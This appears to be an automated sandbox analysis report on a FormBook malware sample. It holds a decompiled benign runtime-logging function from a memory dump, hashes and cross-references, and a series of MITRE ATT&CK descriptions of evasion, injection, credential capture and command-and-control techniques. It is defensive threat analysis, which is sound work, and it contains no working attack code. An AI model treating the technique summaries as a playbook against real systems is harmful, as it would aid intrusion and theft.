Uniqueness Score: -1.00%

Non-executed Functions

Function 049DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E049DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0498CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E049D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E049D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x049dfdda
0x049dfde2
0x049dfde5
0x049dfdec
0x049dfdfa
0x049dfdff
0x049dfe0a
0x049dfe0f
0x049dfe17
0x049dfe1e
0x049dfe19
0x049dfe19
0x049dfe19
0x049dfe20
0x049dfe21
0x049dfe22
0x049dfe25
0x049dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049DFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049DFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049DFE2B

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: e71a98ab0ed2842685997aa7cef72685be7e7c7c94c635593a86d250c7a000d7
Instruction ID: a8c638474c8d830ff848b1d79d3ba60ad2a2669fa8cd7ea81b0d8814e5756cdf
Opcode Fuzzy Hash: e71a98ab0ed2842685997aa7cef72685be7e7c7c94c635593a86d250c7a000d7
Instruction Fuzzy Hash: B2F0F636200201BFEB201B45DC06F23BB6AEBC5B31F258364F628561D1EA62F820D7F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 457b22da_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries